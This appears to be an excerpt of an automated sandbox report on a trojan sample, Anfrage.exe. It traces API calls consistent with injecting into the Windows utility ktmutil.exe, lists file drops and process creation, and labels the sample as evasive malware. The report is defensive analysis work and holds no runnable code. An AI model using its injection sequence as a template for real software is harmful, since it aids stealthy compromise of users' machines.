Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033739B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372AF0 NtWriteFile
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372FA0 NtQuerySection
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03372CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03373010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03373090 NtSetValueKey
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03373D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03373D70 NtOpenThread
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_028E9210 NtCreateFile
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_028E9380 NtReadFile
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_028E9690 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_028E9530 NtClose
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 0_2_004031A3 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Anfrage.exe | File created: C:\Windows\resources\soenderbro.ini
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 0_2_00404959
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 0_2_0040655F
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 0_2_00406D36
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36415630
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_364816CC
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3648F7B0
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363C1460
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3648F43F
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36487571
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_364995C3
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3646D5B0
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D52A0
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_364712ED
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363EB2C0
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3648132D
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363BD34C
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3641739A
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3647F0CC
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_364870E9
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3648F0E0
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D70C0
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3649B16B
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3640516C
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363BF172
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363DB1B0
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D9EB0
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3648FF09
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D1F92
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36393FD2
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36393FD5
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3648FFB1
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36449C32
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3648FCF2
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36481D5A
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36487D73
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D3D40
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363EFDC0
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3648FA49
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36487A46
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36443A6C
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3647DAC6
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36415AA0
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36471AA3
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3646DAAC
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3648FB76
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36445BF0
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3640DBF9
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363EFB80
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3643D800
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D38E0
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36465910
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D9950
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363EB950
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363EC6E0
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D0770
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363F4750
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363CC7C0
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36482446
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36474420
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3647E4F6
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_363D0535
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36490591
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_36470274
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_364502C0
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_3648A352
Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 7_2_364903E6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DE3F07_2_363DE3F0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364620007_2_36462000
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364581587_2_36458158
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C01007_2_363C0100
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646A1187_2_3646A118
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364881CC7_2_364881CC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364901AA7_2_364901AA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364841A27_2_364841A2
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D0E597_2_363D0E59
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648EE267_2_3648EE26
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648EEDB7_2_3648EEDB
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E2E907_2_363E2E90
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648CE937_2_3648CE93
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36444F407_2_36444F40
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F0F307_2_363F0F30
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36412F287_2_36412F28
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36472F307_2_36472F30
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DCFE07_2_363DCFE0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644EFA07_2_3644EFA0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C2FC87_2_363C2FC8
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D0C007_2_363D0C00
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C0CF27_2_363C0CF2
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36470CB57_2_36470CB5
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DAD007_2_363DAD00
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646CD1F7_2_3646CD1F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E8DBF7_2_363E8DBF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CADE07_2_363CADE0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CEA807_2_363CEA80
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648AB407_2_3648AB40
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36486BD77_2_36486BD7
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DA8407_2_363DA840
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D28407_2_363D2840
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B68B87_2_363B68B8
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FE8F07_2_363FE8F0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E69627_2_363E6962
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D29A07_2_363D29A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3649A9A67_2_3649A9A6
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Code function: 8_2_02F963D4
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Code function: 8_2_02F983A8
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Code function: 8_2_02F9EB18
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Code function: 8_2_02F9EB1A
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Code function: 8_2_02FA08C8
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Code function: 8_2_02F98188
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Code function: 8_2_02F9817F
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Code function: 8_2_02FB6FA8
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Code function: 8_2_02F96428
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Code function: 8_2_02F8C539
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033FA352
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_034003E6
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0334E3F0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033E0274
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033C02C0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033DA118
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03330100
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033C8158
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033F41A2
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_034001AA
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033F81CC
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033D2000
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03340770
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03364750
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0333C7C0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0335C6E0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03340535
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03400591
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033E4420
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033F2446
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033EE4F6
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033FAB40
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033F6BD7
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0333EA80
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03356962
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033429A0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0340A9A6
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0334A840
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03342840
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033268B8
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0336E8F0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03360F30
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033E2F30
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03382F28
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033B4F40
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033BEFA0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0334CFE0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03332FC8
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033FEE26
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03340E59
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03352E90
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033FCE93
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033FEEDB
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033DCD1F
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0334AD00
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03358DBF
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0333ADE0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03340C00
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033E0CB5
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03330CF2
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033F132D
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0332D34C
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0338739A
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033452A0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033E12ED
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0335B2C0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0340B16B
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0332F172
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0337516C
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0334B1B0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033F70E9
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033FF0E0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033EF0CC
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033470C0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033FF7B0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03385630
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033F16CC
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033F7571
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_034095C3
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033DD5B0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033FF43F
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03331460
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033FFB76
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0335FB80
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033B5BF0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0337DBF9
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033B3A6C
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033FFA49
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033F7A46
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033DDAAC
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03385AA0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033E1AA3
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033EDAC6
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033D5910
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03349950
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0335B950
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033AD800
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033438E0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033FFF09
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033FFFB1
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03341F92
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03303FD2
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03303FD5
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03349EB0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033F7D73
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033F1D5A
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_03343D40
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_0335FDC0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033B9C32
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_033FFCF2
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_028D1E50
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_028CCF90
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_028CCD67
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_028CCD70
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_028CB010
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_028C1121
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_028D3700
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_028D3702
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_028D54B0
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 9_2_028EBB90
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: String function: 3644F290 appears 103 times
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: String function: 363BB970 appears 280 times
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: String function: 36405130 appears 58 times
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: String function: 3643EA12 appears 82 times
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: String function: 36417E54 appears 111 times
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 0332B970 appears 280 times
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 03375130 appears 58 times
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 033AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 033BF290 appears 105 times
            Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 03387E54 appears 111 times
            Source: Anfrage.exe | Static PE information: invalid certificate
            Source: Anfrage.exe, 00000007.00000002.2484828472.00000000062AA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamektmutil.exej% vs Anfrage.exe
            Source: Anfrage.exe, 00000007.00000002.2484828472.00000000062B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamektmutil.exej% vs Anfrage.exe
            Source: Anfrage.exe, 00000007.00000003.2388742992.0000000036147000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Anfrage.exe
            Source: Anfrage.exe, 00000007.00000002.2511246780.0000000036661000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Anfrage.exe
            Source: Anfrage.exe, 00000007.00000003.2390764590.0000000036309000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Anfrage.exe
            Source: Anfrage.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@5/10@2/2
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 0_2_004031A3 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 0_2_004043E6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
            Source: C:\Users\user\Desktop\Anfrage.exe | Code function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar
            Source: C:\Users\user\Desktop\Anfrage.exe | File created: C:\Users\user\AppData\Roaming\secretaryships
            Source: C:\Users\user\Desktop\Anfrage.exe | File created: C:\Users\user\AppData\Local\Temp\nszF4DB.tmp
            Source: Anfrage.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Anfrage.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Anfrage.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Anfrage.exe | ReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\Anfrage.exe | File read: C:\Users\user\Desktop\Anfrage.exe
            Source: unknown | Process created: C:\Users\user\Desktop\Anfrage.exe "C:\Users\user\Desktop\Anfrage.exe"
            Source: C:\Users\user\Desktop\Anfrage.exe | Process created: C:\Users\user\Desktop\Anfrage.exe "C:\Users\user\Desktop\Anfrage.exe"
